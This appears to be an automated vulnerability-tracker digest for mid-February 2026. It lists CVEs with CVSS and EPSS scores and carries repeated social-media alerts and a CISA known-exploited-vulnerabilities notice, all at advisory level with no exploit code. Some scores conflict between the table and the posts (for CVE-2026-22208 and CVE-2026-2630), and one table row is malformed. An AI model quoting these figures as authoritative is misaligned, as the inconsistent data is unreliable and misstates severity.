##
Updated at UTC 2026-02-18T03:27:37.246004
| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-23599 | 7.8 | 0.00% | 4 | 0 | 2026-02-18T00:16:18.833000 | A local privilege-escalation vulnerability has been discovered in the HPE Aruba | |
| CVE-2026-22048 | 7.1 | 0.00% | 2 | 0 | 2026-02-18T00:16:18.700000 | StorageGRID (formerly StorageGRID Webscale) versions prior to 11.9.0.12 and 12.0 | |
| CVE-2026-26119 | 8.8 | 0.00% | 2 | 0 | 2026-02-17T23:16:22.880000 | Improper authentication in Windows Admin Center allows an authorized attacker to | |
| CVE-2026-1670 | 9.8 | 0.00% | 6 | 0 | 2026-02-17T23:16:19.480000 | The affected products are vulnerable to an unauthenticated API endpoint exposure | |
| CVE-2025-13689 | 8.8 | 0.00% | 2 | 0 | 2026-02-17T23:16:18.740000 | IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute | |
| CVE-2026-2627 | 7.8 | 0.00% | 2 | 0 | 2026-02-17T22:18:45.457000 | A security flaw has been discovered in Softland FBackup up to 9.9. This impacts | |
| CVE-2025-70954 | 7.5 | 0.01% | 2 | 0 | 2026-02-17T21:32:22 | A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) | |
| CVE-2026-22208 | 9.7 | 0.00% | 4 | 0 | 2026-02-17T21:32:21 | OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 con | |
| CVE-2025-67905 | 8.7 | 0.00% | 2 | 0 | 2026-02-17T21:32:21 | Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an ins | |
| CVE-2026-23648 | 7.8 | 0.00% | 2 | 0 | 2026-02-17T21:32:21 | Glory RBG-100 recycler systems using the ISPK-08 software component contain mult | |
| CVE-2026-23647 | 9.8 | 0.00% | 2 | 0 | 2026-02-17T21:32:21 | Glory RBG-100 recycler systems using the ISPK-08 software component contain hard | |
| CVE-2026-0929 | 7.5 | 0.02% | 2 | 0 | 2026-02-17T21:32:21 | The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capa | |
| CVE-2026-1358 | 9.8 | 0.13% | 1 | 0 | 2026-02-17T21:32:21 | Airleader Master versions 6.381 and prior allow for file uploads without restri | |
| CVE-2026-0829 | 5.8 | 0.02% | 1 | 0 | 2026-02-17T21:32:21 | The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenti | |
| CVE-2026-23595 | 8.8 | 0.00% | 2 | 0 | 2026-02-17T21:32:08 | An authentication bypass in the application API allows an unauthorized administr | |
| CVE-2026-22769 | 10.0 | 0.00% | 4 | 0 | 2026-02-17T21:32:08 | Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a | |
| CVE-2026-2630 | 8.8 | 0.00% | 4 | 0 | 2026-02-17T21:32:08 | A Command Injection vulnerability exists where an authenticated, remote attacker | |
| CVE-2026-2441 | 8.8 | 0.03% | 6 | 1 | 2026-02-17T21:22:16.427000 | Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote a | |
| CVE-2025-13691 | 8.1 | 0.00% | 2 | 0 | 2026-02-17T21:22:13.900000 | IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive inform | |
| CVE-2024-7694 | 7.2 | 1.36% | 4 | 0 | 2026-02-17T21:22:13.697000 | ThreatSonar Anti-Ransomware from TeamT5 does not properly validate the content o | |
| CVE-2020-7796 | 9.8 | 90.60% | 4 | 0 | template | 2026-02-17T21:22:12.967000 | Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zi |
| CVE-2008-0015 | 8.8 | 87.52% | 4 | 0 | 2026-02-17T21:16:49.580000 | Stack-based buffer overflow in the CComVariant::ReadFromStream function in the A | |
| CVE-2025-70956 | 7.5 | 0.02% | 2 | 0 | 2026-02-17T18:34:01 | A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) | |
| CVE-2025-65753 | 9.1 | 0.00% | 2 | 1 | 2026-02-17T18:33:00 | An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 a | |
| CVE-2025-70397 | 8.8 | 0.00% | 2 | 0 | 2026-02-17T18:33:00 | jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/ | |
| CVE-2025-70830 | 10.0 | 0.00% | 2 | 1 | 2026-02-17T18:33:00 | A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template | |
| CVE-2025-70828 | 8.8 | 0.00% | 2 | 1 | 2026-02-17T18:32:57 | An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via th | |
| CVE-2025-70866 | 8.8 | 0.01% | 2 | 0 | 2026-02-17T16:20:26.010000 | LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated | |
| CVE-2025-65717 | 9.1 | 0.02% | 4 | 0 | 2026-02-17T15:32:42 | An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to | |
| CVE-2025-65716 | 8.8 | 0.02% | 2 | 0 | 2026-02-17T15:32:42 | An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allo | |
| CVE-2025-15578 | 9.8 | 0.02% | 2 | 0 | 2026-02-17T15:32:42 | Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurel | |
| CVE-2026-2447 | 8.8 | 0.02% | 3 | 0 | 2026-02-17T15:32:41 | Heap buffer overflow in libvpx. This vulnerability affects Firefox < 147.0.4, Fi | |
| CVE-2026-2616 | 8.8 | 0.00% | 2 | 0 | 2026-02-17T15:16:24.717000 | A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted ele | |
| CVE-2026-2474 | 7.5 | 0.03% | 4 | 0 | 2026-02-17T15:16:23.760000 | Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap b | |
| CVE-2026-2439 | 9.8 | 0.02% | 6 | 0 | 2026-02-17T15:16:23.420000 | Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure | |
| CVE-2025-69633 | 9.8 | 0.03% | 2 | 0 | 2026-02-17T15:16:18.877000 | A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreato | |
| CVE-2026-1731 | 9.8 | 61.03% | 1 | 3 | template | 2026-02-17T13:40:10.320000 | BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote |
| CVE-2026-2247 | None | 0.14% | 2 | 0 | 2026-02-17T12:31:18 | SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generat | |
| CVE-2025-7631 | 8.6 | 0.03% | 2 | 0 | 2026-02-17T12:31:13 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
| CVE-2026-25903 | None | 0.03% | 2 | 0 | 2026-02-17T12:31:13 | Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configur | |
| CVE-2026-2592 | 7.7 | 0.07% | 2 | 1 | 2026-02-17T05:16:17.430000 | The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Impro | |
| CVE-2026-26220 | None | 0.55% | 1 | 0 | 2026-02-17T03:30:16 | LightLLM version 1.1.0 and prior contain an unauthenticated remote code executio | |
| CVE-2025-12062 | 8.8 | 0.06% | 1 | 0 | 2026-02-17T00:30:19 | The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & | |
| CVE-2026-2564 | 8.1 | 0.04% | 1 | 1 | 2026-02-16T17:18:09.150000 | A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T | |
| CVE-2026-1333 | 7.8 | 0.01% | 1 | 0 | 2026-02-16T15:32:54 | A Use of Uninitialized Variable vulnerability affecting the EPRT file reading pr | |
| CVE-2026-1046 | 7.6 | 0.03% | 1 | 0 | 2026-02-16T15:32:54 | Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links | |
| CVE-2026-1334 | 7.8 | 0.01% | 1 | 0 | 2026-02-16T14:16:18.160000 | An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in | |
| CVE-2026-2451 | None | 0.05% | 1 | 0 | 2026-02-16T12:32:02 | Emails sent by pretix can utilize placeholders that will be filled with customer | |
| CVE-2026-2452 | None | 0.05% | 1 | 0 | 2026-02-16T12:32:01 | Emails sent by pretix can utilize placeholders that will be filled with customer | |
| CVE-2026-26369 | 9.8 | 0.04% | 1 | 0 | 2026-02-15T18:30:25 | eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerabi | |
| CVE-2025-32062 | 8.8 | 0.02% | 1 | 0 | 2026-02-15T11:15:54.307000 | The specific flaw exists within the Bluetooth stack developed by Alps Alpine of | |
| CVE-2026-1490 | 9.8 | 0.08% | 3 | 1 | 2026-02-15T04:15:53.783000 | The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vu | |
| CVE-2024-43468 | 9.8 | 87.46% | 2 | 3 | 2026-02-13T14:04:05.243000 | Microsoft Configuration Manager Remote Code Execution Vulnerability | |
| CVE-2026-2360 | 8.0 | 0.05% | 2 | 0 | 2026-02-12T15:11:02.290000 | PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superu | |
| CVE-2026-21513 | 8.8 | 2.99% | 1 | 0 | 2026-02-11T15:38:13.670000 | Protection mechanism failure in MSHTML Framework allows an unauthorized attacker | |
| CVE-2026-21510 | 8.8 | 4.65% | 1 | 1 | 2026-02-10T21:31:29 | Protection mechanism failure in Windows Shell allows an unauthorized attacker to | |
| CVE-2026-22903 | 9.8 | 0.57% | 1 | 0 | 2026-02-09T09:30:28 | An unauthenticated remote attacker can send a crafted HTTP request containing an | |
| CVE-2026-1868 | 10.0 | 0.03% | 1 | 0 | 2026-02-09T09:30:28 | GitLab has remediated a vulnerability in the Duo Workflow Service component of G | |
| CVE-2025-64155 | 9.8 | 0.04% | 2 | 4 | 2026-01-20T16:16:06.200000 | An improper neutralization of special elements used in an os command ('os comman | |
| CVE-2026-20965 | 7.6 | 0.03% | 2 | 0 | 2026-01-13T18:31:18 | Improper verification of cryptographic signature in Windows Admin Center allows | |
| CVE-2025-59922 | 7.2 | 0.05% | 2 | 0 | 2026-01-13T18:31:14 | An improper neutralization of special elements used in an SQL command ('SQL Inje | |
| CVE-2025-6264 | 5.5 | 0.06% | 1 | 1 | 2025-10-23T01:00:00.913000 | Velociraptor allows collection of VQL queries packaged into Artifacts from endpo | |
| CVE-2026-02447 | 0 | 0.00% | 1 | 0 | N/A |
updated 2026-02-18T00:16:18.833000
4 posts
🚨 CVE-2026-23599: HIGH severity local privilege escalation in HPE Aruba ClearPass Policy Manager (6.11.0 & 6.12.0, Linux). No patch yet — limit local access, enforce MFA, and monitor systems. https://radar.offseq.com/threat/cve-2026-23599-vulnerability-in-hewlett-packard-en-fdc96349 #OffSeq #Infosec #Vulnerability #ArubaNetworks
##🟠 CVE-2026-23599 - High (7.8)
A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with ro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23599/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CVE-2026-23599: HIGH severity local privilege escalation in HPE Aruba ClearPass Policy Manager (6.11.0 & 6.12.0, Linux). No patch yet — limit local access, enforce MFA, and monitor systems. https://radar.offseq.com/threat/cve-2026-23599-vulnerability-in-hewlett-packard-en-fdc96349 #OffSeq #Infosec #Vulnerability #ArubaNetworks
##🟠 CVE-2026-23599 - High (7.8)
A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with ro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23599/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T00:16:18.700000
2 posts
⚠️ CVE-2026-22048: HIGH-severity SSRF in NETAPP StorageGRID (pre-11.9.0.12, 12.0.0.4) with SSO + Entra ID. Authenticated attackers can delete configs/deny access. Patch or disable SSO now. https://radar.offseq.com/threat/cve-2026-22048-918-in-netapp-storagegrid-formerly--5c913f90 #OffSeq #NETAPP #SSRF #Vulnerability
##⚠️ CVE-2026-22048: HIGH-severity SSRF in NETAPP StorageGRID (pre-11.9.0.12, 12.0.0.4) with SSO + Entra ID. Authenticated attackers can delete configs/deny access. Patch or disable SSO now. https://radar.offseq.com/threat/cve-2026-22048-918-in-netapp-storagegrid-formerly--5c913f90 #OffSeq #NETAPP #SSRF #Vulnerability
##updated 2026-02-17T23:16:22.880000
2 posts
🟠 CVE-2026-26119 - High (8.8)
Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26119/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-26119 - High (8.8)
Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26119/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T23:16:19.480000
6 posts
⚠️ CRITICAL: Honeywell I-HIB2PI-UL 2MP IP (6.1.22.1216) has CVE-2026-1670 (CWE-306) — missing auth on API enables remote attackers to change recovery emails and take over accounts. Patch or segment now! https://radar.offseq.com/threat/cve-2026-1670-cwe-306-missing-authentication-for-c-7263f78b #OffSeq #Honeywell #Vuln #OTSecurity
##🔴 CVE-2026-1670 - Critical (9.8)
The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-1670 - Critical (9.8)
The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##⚠️ CRITICAL: Honeywell I-HIB2PI-UL 2MP IP (6.1.22.1216) has CVE-2026-1670 (CWE-306) — missing auth on API enables remote attackers to change recovery emails and take over accounts. Patch or segment now! https://radar.offseq.com/threat/cve-2026-1670-cwe-306-missing-authentication-for-c-7263f78b #OffSeq #Honeywell #Vuln #OTSecurity
##🔴 CVE-2026-1670 - Critical (9.8)
The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-1670 - Critical (9.8)
The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T23:16:18.740000
2 posts
🟠 CVE-2025-13689 - High (8.8)
IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-13689 - High (8.8)
IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T22:18:45.457000
2 posts
🟠 CVE-2026-2627 - High (7.8)
A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\Program Files\Common Files\microsoft shared\ink\HID.dll of the component Backup/Restore. The manipulation results in link followi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2627/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2627 - High (7.8)
A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\Program Files\Common Files\microsoft shared\ink\HID.dll of the component Backup/Restore. The manipulation results in link followi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2627/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:22
2 posts
🟠 CVE-2025-70954 - High (7.5)
A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) within the TON Blockchain before v2025.06. The issue is located in the execution logic of the INMSGPARAM instruction, where the program fails to validate if a specifi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70954/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70954 - High (7.5)
A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) within the TON Blockchain before v2025.06. The issue is located in the execution logic of the INMSGPARAM instruction, where the program fails to validate if a specifi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70954/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:21
4 posts
🔴 CVE-2026-22208 - Critical (9.6)
OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capabi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22208/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CRITICAL: CVE-2026-22208 in OpenS100 (S-100 viewer) enables RCE via unsandboxed Lua. Attackers can embed malicious scripts in S-100 catalogues — risk of full system compromise. Block untrusted imports & monitor. Patch when released. https://radar.offseq.com/threat/cve-2026-22208-cwe-749-exposed-dangerous-method-or-4594ea65 #OffSeq #CVE202622208 #infosec
##🔴 CVE-2026-22208 - Critical (9.6)
OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capabi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22208/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CRITICAL: CVE-2026-22208 in OpenS100 (S-100 viewer) enables RCE via unsandboxed Lua. Attackers can embed malicious scripts in S-100 catalogues — risk of full system compromise. Block untrusted imports & monitor. Patch when released. https://radar.offseq.com/threat/cve-2026-22208-cwe-749-exposed-dangerous-method-or-4594ea65 #OffSeq #CVE202622208 #infosec
##updated 2026-02-17T21:32:21
2 posts
🟠 CVE-2025-67905 - High (8.7)
Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-67905/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-67905 - High (8.7)
Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-67905/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:21
2 posts
🟠 CVE-2026-23648 - High (7.8)
Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An at...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23648/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23648 - High (7.8)
Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An at...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23648/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:21
2 posts
🔴 CVE-2026-23647 - Critical (9.8)
Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrati...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23647/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-23647 - Critical (9.8)
Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrati...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23647/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:21
2 posts
🟠 CVE-2026-0929 - High (7.5)
The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0929/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-0929 - High (7.5)
The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0929/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:21
1 posts
Critical RCE Vulnerability in Airleader Master Industrial Monitoring Systems
Airleader GmbH patched a critical unauthenticated remote code execution vulnerability (CVE-2026-1358) in its Airleader Master platform that could allow attackers to upload arbitrary files and take control of the system.
**Make sure your Airleader Master is isolated from the internet and accessible only from trusted networks. Then plan a very quick update to version 6.386. If you have isolated the equipment you have a bit of breathing room, but don't forget to patch. Any isolation will be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-rce-vulnerability-in-airleader-master-industrial-monitoring-systems-s-8-1-5-f/gD2P6Ple2L
updated 2026-02-17T21:32:21
1 posts
🔒 CVE-2026-0829 (HIGH): Frontend File Manager plugin ≤23.5 for WordPress has missing authorization, letting unauthenticated users send site emails & access files. Remove or restrict plugin use until patched! https://radar.offseq.com/threat/cve-2026-0829-cwe-862-missing-authorization-in-fro-323c4855 #OffSeq #WordPress #Vuln #BlueTeam
##updated 2026-02-17T21:32:08
2 posts
🟠 CVE-2026-23595 - High (8.8)
An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23595/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23595 - High (8.8)
An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23595/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:08
4 posts
🔴 CVE-2026-22769 - Critical (10)
Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exp...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22769/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##New.
Mandiant:From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day
Dell posted an update on February 11:
Critical: CVE-2026-22769: Security Update for RecoverPoint for Virtual Machines Hardcoded Credential Vulnerability https://www.dell.com/support/kbdoc/en-us/000426773/dsa-2026-079 #infosec #Google #Dell #zeroday
##🔴 CVE-2026-22769 - Critical (10)
Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exp...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22769/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##New.
Mandiant:From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day
Dell posted an update on February 11:
Critical: CVE-2026-22769: Security Update for RecoverPoint for Virtual Machines Hardcoded Credential Vulnerability https://www.dell.com/support/kbdoc/en-us/000426773/dsa-2026-079 #infosec #Google #Dell #zeroday
##updated 2026-02-17T21:32:08
4 posts
🔴 CVE-2026-2630 - Critical (9.9)
A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2630/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CVE-2026-2630: CRITICAL OS Command Injection in Tenable Security Center (CVSS 9.9). Authenticated attackers can run arbitrary code on the server. Restrict access, monitor logs, and patch ASAP. https://radar.offseq.com/threat/cve-2026-2630-cwe-78-improper-neutralization-of-sp-3ee12498 #OffSeq #Tenable #Vuln
##🔴 CVE-2026-2630 - Critical (9.9)
A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2630/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CVE-2026-2630: CRITICAL OS Command Injection in Tenable Security Center (CVSS 9.9). Authenticated attackers can run arbitrary code on the server. Restrict access, monitor logs, and patch ASAP. https://radar.offseq.com/threat/cve-2026-2630-cwe-78-improper-neutralization-of-sp-3ee12498 #OffSeq #Tenable #Vuln
##updated 2026-02-17T21:22:16.427000
6 posts
1 repos
🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2026-2441
Vendor: Google
Product: Chromium
Date Added: 2026-02-17
Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-2441
🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
